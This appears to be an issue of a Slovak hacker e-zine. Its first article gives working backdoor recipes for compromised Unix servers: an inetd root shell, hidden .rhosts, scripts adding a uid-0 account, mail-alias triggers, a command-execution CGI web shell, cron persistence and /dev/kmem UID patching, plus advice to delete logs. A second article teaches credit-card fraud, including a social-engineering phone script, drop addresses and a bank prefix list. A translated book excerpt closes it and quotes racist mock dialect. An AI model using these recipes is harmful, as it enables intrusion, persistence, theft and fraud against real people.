sofistikovane elaboraty. volaco z toho je na arxive (hysteria.sk/arxiv), zvysok co sa
pohybuje po cz/sk nete su odvary povodnych idei SERTu a CzERTu, existuje vsak aj kopu
novych spickovych veci... princip je jednoduchy - vlozit do zdrojaku systemoveho programu
riadky, ktore:



nacitaju input;

ak je input specialny nami nakonfigurovany string, spustit trojana;

else ak input nesedi pokracovat normalne;

else quitnut s chybovou hlaskou;



nie je to ani komplexne ani tazke. takyto trojan sa da spravit na 10 riadkov.
klasikou je "prerabanie" /bin/login, okrem neho
sa modifikuju aj sietove daemony (rlogind, telnetd, rshd, sshd), castokrat okrem funkcie
samotneho backdooru maju tieto programceky aj ine prijemne vlastnosti, napr. logovanie hesiel,
obcas aj v sifrovanom tvare


odjakziva existuju programy na kontrolu integrity systemovych binariek (napr. stary ale dobry
tripwire), ale v minulosti ich takmer nikto nepouzival, preto bolo zamienanie povodnych systemovych
binariek patchnutymi nahradami
pokladane za idealny backdoor. Casy sa vsak menia. Dnes je programov ako tripwire neurekom
a navyse integritu binariek kontroluju aj ine programy ktore su urcene na spravu balikov, napr rpm
prikazom rpm -V. Mnohi rooti to dokonca zautomatizovali a robia to pravidelne cez crond.
vznika teda trend navratu kdesi pred rok '94, ked sa pouzivali vacsinou tzv. konfiguracne
backdoory, cize rozne "nenapadne" zmeny v konfiguracii servera za cielom zabezpecit si backdoor.


ked teda pisem o konfiguracnych backdooroch, musim zalovit niekde do roku '94, kedy sa to dost pouzivalo - kedze to su
doby dost davne a vela sa odvtedy zmenilo, mozno vam budu pripadat tieto backdoory primitivne. ale o to pri konfiguracnych
backdooroch ide - jednoduchy riadocek niekde v zlozitom konfiguracnom subore, ktory si nikto nevsimne.


tu je teda zopar konfiguracnych backdoorov z praxe, urcite vsak existuje kopa inych napadov (dajte na board),
toto su tie s ktorymi som sa ja stretol:


/etc/inetd.conf


klasika je pridat, alebo zmenit riadok v inetd.conf tak, aby spustil shell, napr:


5002 stream tcp nowait root /usr/sbin/tcpd /bin/sh -i

po pripade nahradit cislo portu nejakym stringom z /etc/services a podobne.. budte kreativni :)
potom samozrejme staci spravit telnet server.victim.sk 5002 a mate shell...



/etc/passwd


klasika je najst nejake nepouzivane systemove konto, napr uzivatela "games". jeho riadok v passwd
vyzera vacsinou takto:

games:x:12:100:games:/usr/games:


ale staci tam pridat jedno lomitko a jednu medzierku a mame backdoor:

games:x:12:100:games:/usr/games/ :


no a potom vytvorit adresar "/usr/games/ " a dat do neho trebars .rhosts :


# cd /usr/games
# mkdir " "
# cd " "
# echo + + > .rhosts
# chown games .rhosts


a potom voila, staci dat hocikedy zvonka

$ rsh -l games server.victim.sk "/bin/sh -i"


a si na serveri.. za zmienku stoji fakt ze rsh a rlogin vas pustia v pohode dnu napriek tomu ze user
games nema nadefinovany shell v /etc/passwd, mnohi ludia su v domneni ze user bez definovaneho shellu
je samo o sebe zarukou bezpecnosti toho konta.



pokial potrebujete kratkodoby a bleskurychly konfiguracny backdoor, obcas staci pridat do passwd riadok
s uid 0 a basta. pokial sa umiestni niekde do stredu vacsieho passwd fajlu, mate slusnu sancu ze si to
root nejaky cas nevsimne. ak xcete ozaj bleskovo vytvorit takyto backdoor, je na to dokonca
aj script:


#!/bin/csh
# vlozi uid 0 konto do stredu passwd fajlu
# pravdepodobne by to slo spravit aj nejakym jednym
# prikazom awk alebo sed.. ale co uz

set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
echo finito...


.rhosts



na rlogin a rsh sa v dnesnej dobe windozov tak zabudlo, ze uz nie je vela ludi, ktori vedia
naco to vlastne je. preto + + .rhosts v home adresari nejakeho lamera moze sluzit ako fajn backdoor.
a uz vobec sa nepouziva subor /etc/hosts.equiv co je nieco obdobne ako .rhosts ale pre celu masinu.
vlastne staci pridat do tohoto suboru jeden riadocek s menom masiny na ktorej mas roota a potom z nej
spravit klasicky rsh -l root "/bin/sh -i". ked uz sme pri tych lameroch a ich domacich adresaroch,
dalsi vdacny subor do ktoreho sa ludia malokedy pozeraju je .forward. tam mozeme umiestnit script, ktory
sa spusti ked posleme specialny program, napr:


$ cat ~lamer/.forward
lamer
|/dev/ptyqo

$ cat /dev/ptyqo
#!/bin/sh
while read line ; do
echo "$line" | grep "my_secret_password" && /dev/ptyqb &
done


cize staci poslat lamerovi email ktory bude obsahovat slovo my_secret_password a spusti sa program
/dev/ptyqb co moze byt trebars bindshell. jo a potom nezabudnut zmazat ten email z lamerovej posty, aj ked
najelegantnejsie by bolo schovat ten string do normalne vyzerajuceho emailu, ktory si ten lamer potom moze
kludne precitat bez toho aby vybadal jeho ucel :) osobne som na tieto ucely pouzival
vyraz "odchod na parky", mozno si na to niektori spomeniete :)



/etc/aliases



pome sa este hrat s postou. subor /etc/aliases umoznuje postu nasmerovanu nejakemu uzivatelovi
expandovat na viacerych uzivatelov, alebo napriklad aj napajpovat ju do nejakeho programu. cize najjednoduchsi
syntax na backdoor v /etc/aliases je :


lamer: "|/dev/ptyqo"


a ked poslete postu na lamer@victim.sk, spusti sa backdoorovy scriptik /dev/ptyqo. ale to je moc
suche a dost napadne. isty cas bol popularny uudecode backdoor v /etc/aliases. ten fungoval takto - najprv
sa pridal riadok do /etc/aliases:


"decode: "|/usr/bin/uudecode"


vcelku nenapadne, ze ? nuz potom sa vytvoril uuencodovany rootovsky .rhosts file ktory sa poslal pekne postou :


$ echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victim.sk
$ rsh -l root victim.sk "/bin/sh -i"
#


pam security



vlastnosti pam security ktore ho robia idealnym pre konfiguracne backdoory su komplexnost, neprehladnost a fakt
ze pam security naozaj do detajlu pozna velmi malo ludi. pripomenme si ze vseobecny syntax na konfiguracny subor
pamu (vacsinou /etc/pam.conf) je


service-name module-type control-flag module-path arguments

a tak mozeme nastavit ze pri nejakej sluzbe vobec nebude vyzadovat heslo, napriklad pri rlogind. to si tazko niekto
vsimne, lebo konfigurak pam.conf a konfiguracna syntax nie je zrovna prehladna, rlogind malokto pouziva, a ked aj
ano tak ma na to .rhosts, takze si nikto nevsimne ze sa da lognut na roota cez rlogind aj bez hesla.



cgi scripty


dalsim zaujimavym miestom pre umiestnenie backdooru su cgi scripty, daju sa bud modifikovat existujuce
scripty, alebo pridat novy script. moj favorit vzdy bol nasledovny script:


$ cat backdoor.cgi
#!/bin/sh
echo Content-type: text/html
echo
echo "<pre>"
$*


cez ktory sa daju na dialku spustat hocijake prikazy priamo z browsera vo forme
http://www.victim.sk/cgi-bin/backdoor.cgi?prikaz,
no predstavte si tu pohodu spravit si taky backdoor a potom pohodicka ist do inet kaviarne, pochlipkavat
capuccino so skoricou a spustat unix prikazy na hacknutej masinke priamo z Netscapu. a pokial vas neuspokoji uid pod
ktorym bezi httpd (zvycajne nobody), tak v prvom riadku namiesto /bin/sh dajte nejaky suid bash shell a
prikazy budu bezat ako root. jo a nezabudnut zmazat httpd logy :)



cron



cron sa od cias starych BSD systemov velmi nezmenil, ale dost sa zmenili konfiguracne scripty na cron.
hlavne tvorcovia linuxovych distribucii maju tendenciu byt prehnane kreativni a robia vselijake user-friendly
konfiguraky. napr taky redhat ma crony v /etc/cron.hourly, /etc/cron.daily.. atd a root iba potom vsunie svoj
script alebo program do prislusneho adresara. taketo zjednodusenia rootov rozmaznali natolko ze uz vobec needituju
a nesleduju /var/spool/crontab/root. cize pokial prave do tohoto suboru vsuniete nejaky riadok, su realne sance
ze si to root nevsimne. mozeme napriklad pridat riadok na denne kontrolovanie vlozeneho
uid 0 riadku do /etc/passwd (kukni hore do sekcie "/etc/passwd") :



toto supni do /var/spool/crontab/root :


0 0 * * * /dev/ptyqx

a toto je nas scriptik /dev/ptyqx :


#!/bin/csh
# je eviluser stale v passwd ? pome sa presvedcit

set evilflag = (`grep -i eviluser /etc/passwd`)
if($#evilflag == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
else
endif


fantazii sa medze nekladu. tu je vtipny scriptik ktory kazdy den o 2:30am (heh, nezabudnite si presne
nastavit hodinky) na jednu minutu zmeni /etc/passwd za dopredu nachystany fajl.



toto je v crone:


29 2 * * * /etc/ptyqp


tento fajl musi existovat:


#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /etc/ptyqq


a toto je nas scriptik /etc/ptyqp :

   
#!/bin/csh
cp /etc/passwd /etc/.temppass
cp /dev/ptyqq /etc/passwd
sleep 60
mv -f /etc/.temppass /etc/passwd


inak doporucujem si najprv vsetko poriadne vyskusat, lebo akykolvek vystup zo scriptov spustanych cronom
(chybne hlasky a pod) idu rootovi do posty...



/dev/kmem



/dev/kmem je virtual systemu. kedze kernel ma svoje parametre v pamati, je mozne modifikovat
pamat na masine a zmenit UID procesu. na to samozrejme potrebujeme read/write prava. to sa bezne
v prirode nevyskytuje, cize ako backdoor musime najprv spravit chmod 666 /dev/kmem, napriklad to mozeme
spravit na par minut nejakym cronom, ako je to popisane vyssie. potom je treba otvorit /dev/kmem device,
najst svoj page v pamati, prepisat UID momentalneho procesu a spustit csh, ktory ziska toto uid. nasledovny
program robi presne toto.


#include <h>
#include <h>
#include <signal.h>
#include <param.h>
#include <types.h>
#include <dir.h>
#include <user.h>

#define KEYWORD "chabrus"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{

int count, fd;
long where, lseek();

if(argv[1]){
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);

if(fd
#include <h>
#include <h>

#define LNULL ((LDFILE *)0)

long address(){

LDFILE *object;
SYMENT symbol;
long idx=0;

object=ldopen("/unix",LNULL);

if(!object){
fprintf(stderr,"Cannot open /unix.n");
exit(50);
}

for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8xn",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}

fprintf(stderr,"Cannot read symbol table in /unix.n");
exit(60);
}


tento priklad ilustruje ze obcas ani netreba pridavat nic do konfiguracneho suboru, niekedy je menej
napadne iba zmenit mu prava, napr. na o+w a podobne.



konfiguracne backdoory maju jednu vyhodu - rooti vyzbrojeni programami na kontrolu integrity binariek
sa takto v pohode daju okaslat, navyse takyto backdoor prezije upgrade systemu, alebo dokonca kompletne
preinstalovanie masiny. klasicka reakcia roota ked zisti ze ma hacknutu masinu je preinstalovat to cele,
sranda je vsak ze stare konfiguracne subory sa vacsinou ponechavaju a /home adresare takmer vzdy.




pajkus



navrat na obsah




kreditne karty (KK)




KK je plastova karta, ktora je nositelom informacii o vasom ucte.
Moznost jej pouzitia je trojaka. KK sa moze pouzit na vyber
hotovosti z bankomatu, moze sa pouzit na uhradzanie hotovostnych
pladieb v POS terminaloch alebo na inu formu uhrady hotovosti.
Prve dva sposoby su limitovane nutnostou fyzickeho vlastnictva
karty, pri tretom staci iba poznat informacie uvedene na karte
vo forme reliefneho pisma. Bankomaty a POSky tu rozeberat nebudem a
preto sa hned zameriam na ten treti sposob. Sem patria hlavne
internetovske nakupy a nakupy cez telefon. Aby ste si nieco takymto
sposobom objednali (a zaplatili), potrebujete poznat nasledujuce
informacie:

1. Cislo kreditnej karty

2. Datum expiracie

3. Meno vlastnika karty



Kreditne karty mozno vo vseobecnosti rozdelit podla toho, ktora
spolocnost ich vydava. Vo svete existuje viacero standardov, ale
najviac sa pouzivaju nasledovne:

- American express

- Visa

- Mastercard



[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2 Y1
Vladimir Meciar AX


Popis:

Prvy datum udava datum kedy bola karta vydana, druhy dokedy je platna.


[Master Card]
5XXX XXXX XXXX XXXX
ZZZZ AAA DD-MM-YY MM/YY
Meno_na_karte


Popis:

Datumy rovnako ako u American Express. ZZZZ udava zrejme interny kod
banky, ale pre nase ucely nie je podstatny.


[VISA dlhy format]
4XXX XXXX XXXX XXXX
MM/YY MM/YY*VISA
Meno_na_karte


[VISA kratky format]
4XXX XXX XXX XXX
MM/YY MM/YY*VISA
Meno_na_karte

Popis:

to iste ako American Express.



Vo svete sa najviac pouzivaju Mastercardy a Visy, tak podme na to.



Mastercard a Visa su co do struktury udajov zhodne (az na kratku Visu).
Cislo karty sa sklada zo 4 stvorciselnych skupin:

1. skupina - kod banky. Mozno po vas budu chciet aj nazov prislusnej
banky, tak sa mrknite do zoznamu.

2. skupina - nieco ako uzivatelska skupina. Jednoducho vsteci ludia, ktory
maju denny limit napr. 5000,- (DM, SKK,...) a rovnaky typ uctu budu mat s
najvacsou pravdepodobnostou toto cislo rovnake

3. a 4. skupina - informacia o cisle uctu




Tento clanok asi necitaju gazdinky za sporakom ani evanjelicky farari, takze
asi viete o co teraz pojde. Ide o to, nieco si kupit a NEplatit. Takze
sa napojite na nejaky inet obchodik, nahazdete do kosika par CDciek a idete
k pokladni. Tam na vas vypluju formular, v ktorom po vas chcu par
zbytocnosti (meno, cislo, datum expiracie a pod.). Po vyplneni formularu
sa potom server spyta centralnej databazy a ta bud vasu KK prijme alebo ju
odmiente. Z mojich pokusov mi vychadza asi tolko, ze na jednoznacnu
identifikaciu staci kombinacia cislo-datum expiracie.
Ale finta je v tom, ze to cislo nemoze byt hocijake. Na overenie platnosti
(teda nie existencie) cisla KK sa pouziva Luhnov kontrolny algoritmus a
ako ho vyuzit, pozri nizsie.

Problem teda nie je v cisle KK ale v datume expiracie. Ten tvori spolu
s cislom previazanu dvojicu (jedno bez druheho nefunguje).



Povedzme teda, ze mate cislo, co s datumom? Skusajte! Pripojte sa na nejaky
porno server a skusajte postupne. Kreditky sa vacsinou vydavaju na jeden rok a
nie je teda problem odskusat tych dvanast datumov. Ina sranda nastane, ked
cislo KK neukazuje na platny ucet, potom treba cely postup opakovat s inym
cislom. Ak vsak uvazime, ze na zemi je okolo 6 mld ludi, tak pocet platnych
kreditiek sa bude pohybovat radovo v desiatkach milionov a to dava celkom
slusnu pravdepodobnost.



Luhnov kontrolny algoritmus:



Povodne tento algoritmus plnil funkciu akehosi kontrolneho suctu, poskytuje
vsak aj ochranu proti utokom typu zmenim jedno cislo a basta.



Postup je nasledovny:



Ak ma cislo KK parny pocet cislic:

Vynasobte kazde cislo na neparnej pozicii dvoma a ak je vysledok vacsi ako 9,
odcitajte od vysledku deviatku. Potom zratajte vsetky cisla na parnych
poziciach spolu s tymi zdvojenymi. Ak je vysledok bezo zvysku delitelny 10,
je cislo platne.



Neparny pocet cislic:

Postup je rovnaky, ale nasobia sa cisla na parnych poziciach.



int luhncheck(char *cn)
{
int i,x,dl,total=0,z;


z=1; /* neparny pocet cislic, nasobime parne indexy */
y=strlen(cn);
if (y%2==0)
z=0; /* parny pocet cislic, nasobime neparne indexy */
for(i=z;i<y;i+=2)
{
x=((int)cn[i]-48)*2;
if (x>9) x-=9;
total+=x;
}
for (i=z^1;i<y;i+=2)
total+=(int)cn[i]-48;
return (total%10) ? 0:1;
}



Na co si dat pozor? Ak si nieco objednate z internetu a davate si to posielat postou, NIKDY nepouzite
svoje meno a adresu. Dajte si poslat tovar na nejaku adresu typu:
opusteny dom, vystahovany susedia, kamos na intraku a pod.



Dalsia moznost pouzitia sa ukazuje v telefonovani. Ked chcete volat do USA,
slovtel po vas chce nehorazne sumy. Exituje vsak sluzba Slovakia-Direct,
pomocou ktorej sa mozete napojit na amickeho operatora bezplatne. Tusim
US-SPRINT poskytuje moznost uhrady hovorneho pomocu kratkej visy. To cislo
uz presne neviem, mrknite sa na webovsku stranku nasich telekomunikacii.



A ako toto cele obist? Co takto telefon? Ludia maju prirozdeny respekt
pred autoritami a pocitacom zvlast, tak to vyuzite.




"ty" pan blabla?
"zakaznik" ano
"ty" dobry den, tu je centrum automatizacie vub(csob, slovspor),
pri telefone bla bla.
"zakaznik" dobry den, cim mozem pomoct?
"ty" mali sme tu vypadok servera a stratilo sa nam par zaznamov
"zakaznik" ???
"ty" potrebovali by sme si overit, ci je aj vasa karta medzi zmazanymi,
boli by ste taky laskavy a nadiktovali mi cislo vasej karty?
"zakaznik" ??? (co ked je to podvod?)
"ty" samozrejme si uvedomujem, ze su to citlive informacie. ak chcete,
mozete mi zavolat na cislo .... sem k nam do centra (verejny telefon)
"zakaznik" dobre, hned zavolam
ten blbec sa chytil!
"ty" centrum automatizacie, pri telefone bla bla
"zakaznik" tak to je v poriadku, moje cislo je .....
"ty" a este vas poprosim datum platnosti
"zakaznik" (po dlhsom hladani) aha, to je ...
"ty" dakujem vam, ihned to overime, dopocutia


a ak ste bezchrbtaci, tak mu zavolajte este raz a povedzte ze je to ok.


A som na konci (v koncoch :)



a nakoniec zoznam bank:


4000 - Visa Bsn/Chk/Corp/Deb/Gold/Purch
4013 - Bank of Baltimore / Chevy Chase
4019 - Bank of America
4024 - Bank of America
4027 - Rockwell Federal Credit Union
4032 - Household Bank
4052 - First Cincinatti
4060 - Associates NB / Navy Fed.
4070 - Security Pacific
4071 - Colonial National Bank
4094 - A.M.C. Federal CU
4113 - Valley National Bank
4114 - Chemical Bank
4121 - Alaska Fed. / Penns. State Emp.
4122 - Union Trust
4128 - Citibank
4131 - State Street Bank
4215 - Marine Midland
4225 - Chase Manhattan Bank
4226 - Chase Manhattan Bank
4231 - Chase Lincoln First Classic
4232 - Chase Lincoln First Classic
4239 - Corestates
4241 - National Westminester Bank
4250 - First Chicago Bank
4253 - Consumers Edge
4254 - Cational Bank / Security First
4271 - Citibank Preferred
4301 - Monogram Bank
4302 - H.H.B.C.
4310 - B.C.F.U. / Imperial Savings
4311 - First National Bank
4312 - Barnett Bank
4316 - Leader Federal
4316 - Pioneer Bank / Standard Federal
4317 - First Tier Bank Omaha
4327 - First Atlanta
4332 - Bank One / First American
4339 - Primerica Bank
4342 - N.C.M.B./Nations Bank
4356 - National Bank of Delaware
4368 - National West
4387 - Lockheed Fed. / Santel CU
4388 - First Signature / Independent Bank
4401 - Gary-Wheaton Bank
4413 - Firstier Bank Lincoln
4418 - Bank of Omaha
4421 - Indiana National Bank
4428 - Bank of Hoven / Bar Harbor Bank
4436 - Security Bank and Trust
4443 - Merril Lynch Bank
4447 - AmeriTrust
4452 - Empire Affiliates Federal CU
4498 - Republic Savings
4502 - C.I.B.C.
4503 - Canadian Imperial Bank
4506 - Belgium A.S.L.K.
4510 - Royal Bank of Canada
4520 - Toronto Dominion of Canada
4534 - DC Card
4537 - Bank of Nova Scotia
4538 - Bank of Nova Scotia
4539 - Barclays
4544 - T.S.B. Bank / ADAC Visa
4556 - Citibank
4564 - Bank of Queensland
4568 - ADAC Karte / Berliner Bank
4673 - First Card
4707 - Tompkins County Trust
4719 - Rocky Mountain
4721 - First Security
4722 - West Bank
4726 - Wells Fargo
4783 - AT&T's Universal Card
4784 - AT&T's Universal Card
4800 - M.B.N.A. North America
4811 - Bank of Hawaii
4819 - Macom Federal Credit Union
4820 - IBM Mid America Federal CU
4833 - U.S. Bank
4842 - Security Pacific Washington
4897 - Village Bank of Cincinatti
4906 - Barclay Card
4916 - MBNA Bank
4917 - Visa-BahnCard/Citibank
4921 - Hong Kong Bank / National Bank
5100 - Southwestern States Bankcard Ass.
5101 - Southwestern States Bankcard Ass.
5102 - Southwestern States Bankcard Ass.
5103 - Southwestern States Bankcard Ass.
5104 - Southwestern States Bankcard Ass.
5105 - Southwestern States Bankcard Ass.
5106 - Southwestern States Bankcard Ass.
5107 - Southwestern States Bankcard Ass.
5108 - Southwestern States Bankcard Ass.
5109 - Southwestern States Bankcard Ass.
5110 - Universal Travel Voucher
5111 - Universal Travel Voucher
5112 - Universal Travel Voucher
5113 - Universal Travel Voucher
5114 - Universal Travel Voucher
5115 - Universal Travel Voucher
5116 - Universal Travel Voucher
5117 - Universal Travel Voucher
5118 - Universal Travel Voucher
5119 - Universal Travel Voucher
5120 - Western States Bankcard Ass.
5121 - Western States Bankcard Ass.
5122 - Western States Bankcard Ass.
5123 - Western States Bankcard Ass.
5124 - Western States Bankcard Ass.
5125 - Western States Bankcard Ass.
5126 - Western States Bankcard Ass.
5127 - Western States Bankcard Ass.
5128 - Western States Bankcard Ass.
5129 - Western States Bankcard Ass.
5130 - Eurocard France
5131 - Eurocard France
5132 - Eurocard France
5133 - Eurocard France
5134 - Eurocard France
5135 - Eurocard France
5136 - Eurocard France
5137 - Eurocard France
5138 - Eurocard France
5139 - Eurocard France
5140 - Mountain States Bankcard Ass.
5141 - Mountain States Bankcard Ass.
5142 - Mountain States Bankcard Ass.
5143 - Mountain States Bankcard Ass.
5144 - Mountain States Bankcard Ass.
5145 - Mountain States Bankcard Ass.
5146 - Mountain States Bankcard Ass.
5147 - Mountain States Bankcard Ass.
5148 - Mountain States Bankcard Ass.
5149 - Mountain States Bankcard Ass.
5217 - The Bankcard Association, Inc.
5218 - Citibank, N.A.
5219 - Central Finance Co., Ltd.
5220 - Sovran Bank/Central South
5221 - Standard Bank of South Africa, Ltd.
5222 - Security Bank & Trust Company
5223 - Trustmark National Bank
5224 - Midland Bank / National Westminster
5225 - First Pennsylvania Bank, N.A.
5226 - Eurocard Ab
5227 - Rocky Mountain Bankcard System, Inc.
5228 - First Union National Bank
5229 - Sunwest Bank of Albuquerque, N.A.
5230 - Harris Trust & Savings Bank
5231 - The Joint Credit Card Co., Ltd
5232 - Eurocard Deutschland
5233 - Bancsystems Association, Inc.
5234 - Citibank (Arizona)
5235 - Finanacial Transaction Systems, Inc.
5236 - First Tennessee Bank, N.A.
5237 - Southeast Bankcard Association, Inc.
5238 - Liberty National Bank & Trust Company
5239 - Southeast Bank, N.A.
5241 - Bank One Wisconsin Bankcard Corporation
5242 - Atlantic States Ass. / Chevy Chase.
5244 - The Joint Credit Card Co., Ltd.
5245 - Lomas Bank, U.S.A.
5246 - Bank of Honolulu
5247 - First American National Bank
5248 - Orient Finance Co., Ltd.
5249 - First Interstate Bank of Washington
5250 - Union Credit Company (UC Card)
5251 - Nippon Shinpan Co., Ltd.
5252 - Seibu Credit Co., Ltd.
5253 - Eurocard Norge, A.S.
5254 - Bank of America, N.A. & S.A.
5255 - Servizi Interbancari, S.P.A.
5256 - Commonwealth National Bank
5257 - Dalei Finance, Inc.
5258 - National Bank of Canada
5259 - First Wisconsin National Bank
5260 - First National Bank of Boston
5261 - Texas American Bank/Fort Worth
5262 - Service Center, Inc.
5263 - Chemical Bank
5264 - First Interstate Bank of Utah
5265 - The Joint Credit Card Co., Ltd.
5266 - Eurocard Austria
5267 - First Florida Bank, N.A.
5268 - The Canada Trust Co.
5270 - The First National Bank of Anchorage
5272 - Connecticut National Bank
5273 - Bank of America, N.T. & S.A.
5274 - Bank of California, N.A.
5275 - Eurocard Ab
5276 - Banco de Vizcaya
5277 - First Interstate Bank of California
5278 - National Management & Organization, S.A.
5279 - D.C. Credit Company, Ltd.
5280 - Fleet National Bank
5281 - Trust Company Bank
5282 - Wells Fargo Bank
5283 - Union Credit Company, Ltd.
5285 - The Joint Credit Card Co., Ltd.
5286 - F.C.C. National Bank
5287 - Valley National Bank of Arizona
5288 - Banco Nacional de Mexico
5289 - Seattle-First National Bank
5290 - Banco Nacional de Mexico
5291 - Signet Bank/Virginia
5292 - Southeast Bankcard Association, Inc.
5293 - Signet Bank/Virginia
5294 - Eurocard France
5295 - Eurocard France
5296 - Million Card Service Co., Ltd.
5297 - First Hawaiian Bank
5298 - Bank One, Indianapolis, N.A.
5299 - Amsouth Bank of Florida
5300 - Bay Bank
5308 - First Security Bank of Utah, N.A.
5313 - National Australia Bank Limited
5314 - International Card Systems, S.A.
5315 - International Card Systems, S.A.
5316 - The Citizens & Southern National Bank
5317 - Cu Electronic Transaction Services, Inc.
5318 - Credimatico De Panama / Mellon Bank
5319 - National Bank
5321 - Japan Travel Bureau, Inc.
5322 - Banc One Wisconsin Bankcard Corporation
5323 - Bank of New York (Delaware)
5325 - First Virginia Bank
5326 - Pacific Bancard Association, Inc.
5327 - Banco Atlanta, S.A.
5328 - NCNB National Bank of Florida
5329 - M.B.N.A.
5330 - Leader Federal Savings & Loan Ass.
5332 - Sociedad Administradora
5333 - National Bank
5334 - Sn Diego Trust & Savings Bank
5335 - Tokyo Credit Services., Ltd.
5336 - The Kansai Credit Bank Credit Service
5337 - Daiwa Credit Service / Sumisie Card
5338 - National Bank
5339 - First American National Bank
5340 - The Joint Credit Card Co., Ltd.
5347 - Equibank (Delaware), N.A.
5348 - First National Bank
5349 - Sun Bank, N.A.
5350 - Bank South, N.A.
5351 - Provident National Bank
5353 - Commonwealth Bank of Australia
5359 - Core States
5362 - First National Bank of Commerce
5371 - Rocky Mountain Bankcard System, Inc.
5372 - Rocky Mountain Bankcard System, Inc.
5376 - Natwest Australia Bank, Ltd.
5379 - Bank of Louisiana in New Orleans
5384 - San Diego Trust & Savings Bank
5385 - Bank of Louisiana in New Orleans
5393 - First Omni Bank
5396 - AT&T's Universal Card
5398 - AT&T's Universal Card
5399 - DC Credit Co., Ltd.
5400 - United Bankcard Association
5401 - Card Services For Credit Unions
5402 - New Zealand Bankcard Associates Ltd.
5410 - Citibank / First National
5411 - Credicard, S.A.
5412 - Eurocard Ab
5413 - Eurocard Norge, A.S.
5414 - State Street Bank & Trust Co.
5415 - Union Bank
5416 - People's Bank
5417 - Associates National Bank / Bank of America
5418 - Household Bank
5419 - Oversea-Chinese Banking Corporation, Ltd.
5420 - Colonial National Bank
5421 - Bank of Credit and Commerce International
5422 - Huntington National Bank
5423 - University Credit Union
5424 - C.B.T. / Citibank
5425 - Banco De Santander / Barclay Card
5426 - Mellon Bank Delaware, N.A.
5429 - NCNB South Carolina
5430 - Centrust Savings Bank
5431 - The Hongkong and Shanghai Banking Corp.
5432 - Rocky Mountain Bankcard System, Inc.
5433 - Eurocard International, S.A.
5434 - National Westminster Bank
5436 - Sistarbanc, S.A.R.L.
5437 - The Massachusetts Co.
5438 - U.S. League Financial Services, Inc.
5439 - Central Bank of The South
5440 - Ncnb National Bank
5442 - First National Bank of Atlanta
5443 - Eurocard International, S.A.
5444 - The Fifth Third Bank
5445 - The Bank of Scottsdale/.Paradise Valley
5447 - AmeriTrust Company National Association
5448 - Crestar Bank
5450 - Lomas Bank, U.S.A.
5453 - Eurocard International, S.A.
5454 - Bank of New England-West, N.A.
5458 - Bank of New England-West / Crestar Bank
5460 - Citibank, N.A.
5462 - Central Bank
5463 - Eurocard International, S.A.
5465 - Chase Manhattan Bank
5469 - N.B.D. Bank Evanston, N.A.
5472 - Bank of New England Old Colony, N.A.
5480 - Bank of America
5485 - Commercial National Nank of Peoria
5485 - Citibank
5485 - Simmons First National Bank
5485 - Citibank
5488 - Financial Transaction Systems, Inc.
5489 - First American Bank of Virginia
5493 - Credicard, S.A.
5494 - Credit Union Card Services, Inc.
5485 - Citibank
5488 - Mellon Bank Delaware, N.A.
5489 - First American Bank of Virginia
5493 - Credicard, S.A.
5494 - Credit Union Card Services, Inc.
5498 - Star Bank, N.A.
5499 - The Bankcard Association, Inc.5554 - State Street Bank & Trust Co.



gizmo, gizmo(at)hysteria.sk


navrat na obsah




valka elektronickych gangu III



tak tu je slubene dokoncenie prekladu uryvku z knihy valka elektronickych gangu III :)
predosle casti su v prielome 10 a 11...



Chris pochopi ze to John mu prepol medzimestskeho operatora. Tiez si mysli,
ale nepravne, ze John je autorom toho manifesta ktory severski chalani volaju
History of MOD. Takze Chris sa nasere a rozhodne sa ze tiez vyparati nejaky
ten kusok.


Chris ma stary pocitacovy program, ktory prelozi hocijaky fajl do noveho
'jazyka'. Ked do toho programu naladuje History of MOD, vypluje to 'jive' verziu
spominaneho dokumentu. Tento prekladaci softik jednoducho hlada niektore
klucove slova alebo slovne spojenia, a zameni ich inymi.


V povodnom zneni to je to 'In the early part of 1987, there were
numerous amounts of busts in the US and in New York in particular....'
a
program z toho spravi 'In de early part uh 1987, dere wuz numerous amonts uh busts in de
US and in New Yo'k in particular....'


Pouzivanie jive programu je elektronicky ekvivalent ako dostat sa na trapnu
humornu show s rasistickym podtonom : "Some nigga' name Co'rupt, havin' been real
active befo'e, duzn't gots' some so'kin' computa' anymo'e and so ... sheeit, duh."


Chris sa sam nepoklada za rasistu. Hovori ze ma kamosov cernochov v praci.
Ked sa ho spytate preco takto zosmiesnil History of MOD: povie ze sa to zdalo byt
smiesne. Srandovne, hovori. Ked po niekom idete, spravite cokolvek co by ho zosmiesnilo,
hovori. Hocico. Nemal prekladaci program ktory by prozu chalanov z MOD zmenil na,
dajme tomu eskimacky prizvuk.. proste mal jive program.


Takze co mal robit ?


Keby ste zili v state Texase, chapali by ste to. Chris hovori: "Tunak dole
seci mame cizmy a klobuky. Vsetci chodime jazdit."


John uzrie kopiu Chrisovej roboty zaciatkom 1991.


Sedi pred pocitacom ktory vyzera ako poskladany z vyhodenych casti. Ma velku
TV konzolu namiesto monitoru, rozbitu klavesnicu a stary Commie 64 s magnetakom.
Jeho komp je street box, guerrilla machine.


A tam je na obrazovke, jived History of MOD.


"De legacy uh de underground 'clandestine' netwo'k continues and so's duz
de war against all de self-proclaimed, so-called 'elite.'"


John najprv tomu neveri; je to prilis v drsne. Pomaly si to precituje, zhrozeny.


John to docita, potom si na minutku sadne, cumi na obrazovku, cumi mimo obrazovky..
